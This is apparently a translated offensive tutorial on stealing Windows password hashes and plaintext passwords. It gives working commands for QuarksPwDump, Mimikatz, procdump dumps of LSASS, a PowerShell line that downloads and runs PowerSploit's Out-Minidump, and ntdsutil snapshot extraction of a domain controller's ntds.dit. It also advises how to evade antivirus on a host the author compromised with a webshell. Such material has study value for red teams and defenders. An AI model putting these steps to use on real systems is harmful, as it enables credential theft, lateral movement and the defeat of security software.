0x01 Windows password hashes
Early SMB transmitted passwords over the network in plaintext. It was followed by the LAN Manager challenge/response authentication mechanism, LM, which is so simple that it is easily cracked. Microsoft then introduced the Windows NT challenge/response mechanism, NTLM, and there are now the updated NTLMv2 and the Kerberos authentication system. The encrypted form in which Windows stores a password is called its hash. By default a Windows password hash record consists of two parts: the first is the LM hash, the second the NTLM hash (NT hash).
Compared with the LM hash algorithm, the NTLM hash algorithm has these properties: the plaintext password is case-sensitive; one cannot tell from the NTLM hash whether the plaintext password is shorter than 8 bytes; and the magic string "KGS!@#$%" is gone (the NT hash is simply an unsalted MD4 of the password encoded as UTF-16LE). MD4 is a true one-way hash function, so recovering the plaintext from the hash is harder. The problem is that while Microsoft insisted the NTLM hash was stronger, in order to maintain backward compatibility the NTLM hash was by default always stored together with the LM hash. The greater strength of the NTLM hash therefore did not make the system safer; it was potentially damaging to security: an attacker first exploits the weakness of the LM hash to recover a case-insensitive version of the plaintext password, then uses the NTLM hash to fix the case and obtain the exact password. (The LM hash is computed over the password uppercased, padded to 14 bytes and split into two 7-byte halves, each used as a DES key to encrypt "KGS!@#$%", which is why it leaks both the length class and the case-insensitive value. Since Windows Vista and Server 2008, LM hash storage is disabled by default, so the LM field usually holds the fixed empty value aad3b435b51404eeaad3b435b51404ee.)
The format of a dumped Windows password hash is username:RID:LM-hash:NT-hash:::, for example:
Administrator:500:c8825db10f2590eaaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc:::
which means:
Username: Administrator
RID: 500
LM hash: c8825db10f2590eaaad3b435b51404ee
NT hash: 683020925c5d8569c23aa724774ce6cc
In this example the second half of the LM hash is aad3b435b51404ee, the DES output for an all-zero 7-byte key, which tells us the password is at most 7 characters long.
Once you have a user's hashes, take c8825db10f2590eaaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc to an online hash lookup site. Because neither hash is salted, identical passwords always produce identical hashes, which is what makes precomputed tables and online lookups work.
0x02 QuarksPwDump
QuarksPwDump v0.2b is generally used to grab password hashes across the whole Windows family; the resulting hash values can then be queried at http://www.objectif-securite.ch/ophcrack.php.
The QuarksPwDump command to grab the local hashes is as follows (for the other commands see the tool's documentation):
QuarksPwDump.exe -dhl
Take all the resulting hash values and crack them online.
0x03 Mimikatz
Testing with the password-grabbing artifact Mimikatz, the commands are as follows:
privilege::debug
sekurlsa::logonpasswords
The result is shown in the figure below:
It can be seen that the LM hash reported by Mimikatz differs from the one grabbed by QuarksPwDump, and that Mimikatz also obtains the system password directly in plaintext; the NT hash obtained by the two tools is identical. Note that sekurlsa::logonpasswords reads the credentials of logged-on sessions out of LSASS memory, whereas QuarksPwDump -dhl reads the hashes stored in the SAM; plaintext passwords are available this way only where WDigest credential caching is enabled, which was the default before Windows 8.1 / Server 2012 R2.
This scenario comes up during penetration testing: I have connected to the target host with China Chopper, but the system has 360 Security Guard or other security software installed by default. When I uploaded Mimikatz and QuarksPwDump, both were detected and killed. That is, getting the system's password hashes with these two tools in the conventional way is unlikely to work. In fact, we can first dump the target host's lsass memory to a file, then process it with Mimikatz on our own host, and so obtain the target system's hashes and passwords.
Procdump can be downloaded from Microsoft's official site (Sysinternals); being a signed Microsoft tool, the binary itself is not flagged by anti-virus software, although some EDR products alert on any process that opens a handle to lsass.exe.
The command is as follows:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
This is illustrated below:
Next, the dump is processed locally with Mimikatz:
First enter the command:
sekurlsa::minidump lsass.dmp
Then enter the command:
sekurlsa::logonpasswords
As can be seen, the system password can be obtained offline, bypassing the anti-virus software on the target. Use a Mimikatz build of the same architecture as the target (64-bit for a dump of a 64-bit LSASS), and preferably run it on the same Windows version as the target.
The cloud knowledge base also has a PowerShell command that does the same job as Procdump, using the Out-Minidump script from PowerSploit. The specific command is as follows:
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump"
I tried it on the compromised host and found that it works, although the Chopper virtual terminal shows an error even though the PowerShell code has actually executed successfully. Overall, though, Procdump still feels more convenient to use.
Mimikatz is also integrated into Metasploit; for a tutorial see http://www.offensive-security.com/metasploit-unleashed/Mimikatz
0x04 NTDSDump related
Unable to bear ntdsxtract's snail's pace, I modified QuarksPwDump into an offline extraction tool that can read SYSTEM.hiv.
ntds.dit is in fact an ESE (ESENT) database, and Microsoft itself documents a set of APIs for operating on such databases.
Its command line is as follows:
NTDSDump.exe <-f ntds.dit> <-k hex-sys-key | -s system.hiv> [-o out.txt] [-h] [-t john|lc]
-f  path to ntds.dit
-k  syskey in hexadecimal (optional; alternative to -s)
-s  path to SYSTEM.hiv (optional; alternative to -k)
-h  also export password history records
-t  export format, lc or john
-o  export to the specified file
The syskey is in fact the class information of the subkeys JD, Skew1, GBG and Data under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, which can be queried with RegQueryInfoKey.
The attachment provides two export tools: Getsyskey_c.exe, compiled with VC6 from the source Getsyskey.cpp (open and build it directly in VC6), and Getsyskey_cs.exe, compiled for .NET 2.0 from the source Getsyskey.cs (compile it directly with csc).
Known error:
JetAttachDatabase() failed
Cause: the database needs repair; run esentutl /p /o ntds.dit to repair it (work on a copy, since /p is a lossy repair).
Also: after making the change I looked at QuarksPwDump's GitHub and found that someone had submitted a pull request: https://github.com/quarkslab/quarkspwdump/pull/3
It adds a function that loads SYSTEM.hiv by calling RegLoadKey. That API requires an elevated process (past UAC) holding the backup and restore privileges, so it is quite awkward to use; reading the file directly, as done here, is much more pleasant.
SecPulse's approach
On a 2008+ domain controller, export ntds.dit, SAM and SYSTEM using an ntdsutil snapshot mount:
ntdsutil
snapshot
activate instance ntds
create
mount {GUID}
then, from a normal command prompt, copy the file out of the mounted snapshot:
copy c:\MOUNT_POINT\WINDOWS\NTDS\ntds.dit c:\NTDS_saved.dit
and finally unmount {GUID}, quit, quit. After that it is just copying: the SAM and SYSTEM hives are taken out of the same snapshot in the same way.
Use QuarksPwDump.exe on the domain controller to export most of the hashes:
QuarksPwDump.exe --dump-hash-domain --output SecPulseHash.txt --ntds-file c:\ntds.dit
Downloading the files and re-running QuarksPwDump locally does not seem to work, mainly because the SYSTEM hive cannot be specified locally, so the syskey cannot be obtained.
QuarksPwDump usage parameters, for reference:
quarks-pwdump.exe <options>
Options:
  -dhl   --dump-hash-local
  -dhdc  --dump-hash-domain-cached
  -dhd   --dump-hash-domain (NTDS_FILE must be specified)
  -db    --dump-bitlocker (NTDS_FILE must be specified)
  -nt    --ntds-file FILE
  -hist  --with-history (optional)
  -t     --output-type john/lc (optional; default john)
  -o     --output FILE (optional; default stdout)
Example: quarks-pwdump.exe --dump-hash-domain --with-history
Of course, you can also download ntds.dit, SAM and SYSTEM and decrypt them with a tool (many enterprise ntds.dit files are several GB, so downloading them is not very practical), but that feels rather heavy; now we can simply use NTDSDump.exe:
NTDSDump.exe -f ntds.dit -s SYSTEM -o SecPulseHash.txt
0x05 Reference links
https://www.secpulse.com/archives/6301.html
https://www.cnblogs.com/hiccup/p/4380298.html
About grabbing Windows system passwords